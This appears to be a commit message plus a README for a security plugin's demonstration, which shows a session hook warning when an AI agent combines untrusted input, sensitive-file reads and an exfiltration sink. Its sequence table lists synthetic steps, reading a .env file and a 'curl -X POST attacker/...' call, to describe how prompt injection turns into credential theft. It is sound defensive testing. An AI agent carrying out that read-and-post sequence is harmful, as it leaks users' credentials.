Companion to 8df5d5c (which only carried the doc updates — the example
directories themselves were left out of staging by mistake). This
commit adds the actual example directories:
- examples/lethal-trifecta-walkthrough/{README.md, run-trifecta.mjs,
expected-findings.md}
- examples/mcp-rug-pull/{README.md, run-rug-pull.mjs,
expected-findings.md}
Plus plugin CLAUDE.md "Examples (runnable demonstrations)" section
with a 4-row table covering malicious-skill-demo, prompt-injection-
showcase, lethal-trifecta-walkthrough, and mcp-rug-pull plus the
state-isolation discipline notes.
Marketplace root README unchanged since plugin's outward coverage
is unchanged ([skip-docs] covers the marketplace-level gate).
104 lines
4.4 KiB
Markdown
# Lethal Trifecta Walkthrough

> **WARNING: This is a security demonstration fixture, NOT a real attack.**
> All payloads are synthetic. No external network is contacted, no real
> file is read, no real command is executed. The script only feeds JSON
> payloads to one of llm-security's hook scripts.

## What this demonstrates

The **Rule of Two** (Meta, Oct 2025): an agent must never simultaneously
hold all three of:

1. **Untrusted input** — content the model didn't author (web pages, MCP
   output, document uploads, prompt injection surface)
2. **Sensitive data access** — files like `.env`, `.ssh/`, `.aws/`,
   credential stores
3. **Exfiltration sink** — a path off the box (HTTP POST, scp, paste sites)

Any two are acceptable. All three at once is the **lethal trifecta**
(Simon Willison / Invariant Labs framing) — at that point, prompt
injection becomes credential theft.

`post-session-guard.mjs` (PostToolUse hook on every tool) tracks tool
calls in a 20-call sliding window and emits a SECURITY ADVISORY when all
three classes appear. This walkthrough shows it firing on a 5-step
sequence.

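The sliding-window check described above can be sketched as follows. This is a minimal illustration, not the hook's actual code: `WINDOW_SIZE`, `TRIFECTA_CLASSES`, and `trifectaInWindow` are hypothetical names, and the class labels are borrowed from the sequence table in this README.

```javascript
// Hypothetical names throughout; the hook's real internals are not shown in this README.
const WINDOW_SIZE = 20; // window length stated in the paragraph above
const TRIFECTA_CLASSES = ['input_source', 'data_access', 'exfil_sink'];

// Returns true when the most recent WINDOW_SIZE calls contain all three classes.
function trifectaInWindow(calls) {
  const seen = new Set(calls.slice(-WINDOW_SIZE).map((call) => call.class));
  return TRIFECTA_CLASSES.every((cls) => seen.has(cls));
}

const calls = [
  { tool: 'WebFetch', class: 'input_source' },
  { tool: 'Read', class: 'data_access' },
];
const beforeExfil = trifectaInWindow(calls); // only two legs present

calls.push({ tool: 'Bash', class: 'exfil_sink' });
const afterExfil = trifectaInWindow(calls); // third leg closes the trifecta

console.log({ beforeExfil, afterExfil }); // { beforeExfil: false, afterExfil: true }
```

Because only the last 20 calls are inspected, a leg that scrolls out of the window no longer counts toward the trifecta in this sketch.
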
## Sequence

| # | Tool | Class | Advisory? |
|---|------|-------|-----------|
| 1 | WebFetch | input_source | no — only one class |
| 2 | Read `/path/.env` | data_access (sensitive) | no — only two classes |
| 3 | Bash `curl -X POST attacker/...` | exfil_sink | **YES — trifecta closes** |
| 4 | Bash `ls -la` | neutral | no — already warned in window |
| 5 | Bash `curl -X POST attacker/...` | exfil_sink | no — suppressed |

The advisory at step 3 lists the evidence and recommends remediations
(disable HTTP exfil, gate sensitive-path reads, narrow tool surface).
Steps 4 and 5 are present to show suppression: `post-session-guard` writes a
warning marker into the state file so the operator isn't spammed by the
same trifecta repeating within the window.

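The five rows and the suppression behavior can be replayed with a small sketch. It is an illustration under assumptions: the class labels are hard-coded rather than derived from the tool call, the in-memory `warned` flag stands in for the warning marker in the state file, and `replay` is a hypothetical name. The 20-call window is omitted because all five steps fit inside it.

```javascript
// Sketch only: the real hook classifies each call itself and persists its
// marker to the state file. All names here are hypothetical.
const LEGS = ['input_source', 'data_access', 'exfil_sink'];

function replay(steps) {
  const seen = new Set();
  let warned = false; // stands in for the warning marker in the state file
  return steps.map((step) => {
    seen.add(step.class);
    const complete = LEGS.every((leg) => seen.has(leg));
    const advisory = complete && !warned; // fire once, then suppress
    if (advisory) warned = true;
    return { tool: step.tool, advisory };
  });
}

const outcome = replay([
  { tool: 'WebFetch', class: 'input_source' },
  { tool: 'Read', class: 'data_access' },
  { tool: 'Bash', class: 'exfil_sink' },
  { tool: 'Bash', class: 'neutral' },
  { tool: 'Bash', class: 'exfil_sink' },
]);

console.log(outcome.map((row) => row.advisory));
// [ false, false, true, false, false ]
```

The output matches the Advisory? column: one advisory at step 3, then silence for the repeated exfil call at step 5.
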
## How to run

```bash
cd plugins/llm-security
node examples/lethal-trifecta-walkthrough/run-trifecta.mjs

# Detailed output (full advisory text + stderr)
node examples/lethal-trifecta-walkthrough/run-trifecta.mjs --verbose
```

Expected: `5 pass, 0 fail` and a `SECURITY ADVISORY (session-guard)`
preview after step 3.

## Hooks / scanners involved

- **`hooks/scripts/post-session-guard.mjs`** — the only hook invoked.
  Configurable via `policy.json` `trifecta.mode` (`block` / `warn` /
  `off`; default `warn`) or env var `LLM_SECURITY_TRIFECTA_MODE`.

This example uses `mode: warn` (default). In `block` mode the third
call's advisory becomes a hard block (exit 2) and the agent action is
denied — see `docs/security-hardening-guide.md` §3 for when to switch.

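One way the mode could be resolved from the two configuration sources is sketched below. Two points are assumptions rather than documented behavior: that the env var takes precedence over `policy.json`, and that the hook exits 0 whenever it does not block. `resolveTrifectaMode` and `exitCodeFor` are hypothetical helper names.

```javascript
const VALID_MODES = ['block', 'warn', 'off'];

// Assumption: the env var wins over policy.json. This README does not state
// the precedence, so check the hardening guide before relying on it.
function resolveTrifectaMode(policy = {}, env = {}) {
  const candidates = [env.LLM_SECURITY_TRIFECTA_MODE, policy.trifecta?.mode];
  return candidates.find((mode) => VALID_MODES.includes(mode)) ?? 'warn';
}

// Exit 2 is the hard block described above; exit 0 otherwise is an assumption.
function exitCodeFor(mode, trifectaDetected) {
  return mode === 'block' && trifectaDetected ? 2 : 0;
}

const mode = resolveTrifectaMode({ trifecta: { mode: 'block' } }, {});
console.log(mode, exitCodeFor(mode, true)); // block 2
console.log(resolveTrifectaMode({}, {})); // warn
```

Unrecognized values fall through to the next source and finally to `warn`, so in this sketch a typo in the configuration cannot silently switch the guard off.
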
## OWASP / framework mapping

| Code | Framework | Why |
|------|-----------|-----|
| LLM01 | OWASP LLM Top 10 (2025) | Prompt injection lands via the input_source leg |
| LLM02 | OWASP LLM Top 10 (2025) | Sensitive Information Disclosure (the .env exfil) |
| ASI01 | OWASP Agentic Top 10 | Excessive Agency — agent holds all three capabilities |
| ASI02 | OWASP Agentic Top 10 | Agent Data Leakage — exfil sink + sensitive read |

## State isolation

`post-session-guard` stores per-session state at
`${os.tmpdir()}/llm-security-session-${ppid}.jsonl`. Because all five
hook invocations are spawned by the same `run-trifecta.mjs` process,
they share that script's PID as their parent PID — so the entire
walkthrough lives in a single state file. The script deletes the file
in a `finally` block before exiting. **Your real session state under
`/tmp/` is never touched.**

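The isolation argument follows directly from the path template. A minimal sketch, assuming a hypothetical helper `stateFilePath` and made-up PIDs:

```javascript
// Hypothetical helper that mirrors the path template quoted above.
function stateFilePath(tmpDir, parentPid) {
  return `${tmpDir}/llm-security-session-${parentPid}.jsonl`;
}

const runnerPid = 4242; // made-up PID of run-trifecta.mjs
const realSessionPid = 1001; // made-up PID of a real agent session

// Each of the five hook processes sees the runner's PID as its parent PID,
// so every invocation resolves to the same file.
const hookPaths = [1, 2, 3, 4, 5].map(() => stateFilePath('/tmp', runnerPid));
const distinctFiles = new Set(hookPaths).size;
const collides =
  stateFilePath('/tmp', runnerPid) === stateFilePath('/tmp', realSessionPid);

console.log(distinctFiles); // 1
console.log(collides); // false
```

A real session has a different parent PID, so it resolves to a different file name and the walkthrough's cleanup cannot delete it.
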
## Limitations

- The walkthrough demonstrates the *primary* 20-call sliding-window
  trifecta. It does not exercise the 100-call slow-burn variant
  (`SLOW_BURN_MIN_SPREAD = 50`), the MCP-concentrated variant
  (all three legs from the same MCP server), behavioral drift via
  Jensen-Shannon divergence, or volume-threshold advisories.
  Those have their own unit tests under `tests/lib/post-session-guard.*`.
- Detection is deterministic. The walkthrough does not exercise the
  `block`-mode exit-2 path; set `LLM_SECURITY_TRIFECTA_MODE=block`
  and re-run if you want to see the script fail at step 3.

## See also

- `docs/security-hardening-guide.md` §3 — Rule of Two and configuration
- `knowledge/owasp-agentic-top10.md` — ASI01 / ASI02 background
- `knowledge/deepmind-agent-traps.md` — adjacent attack categories
- `examples/prompt-injection-showcase/` — the input_source leg in isolation
- `expected-findings.md` (in this folder) — the testable contract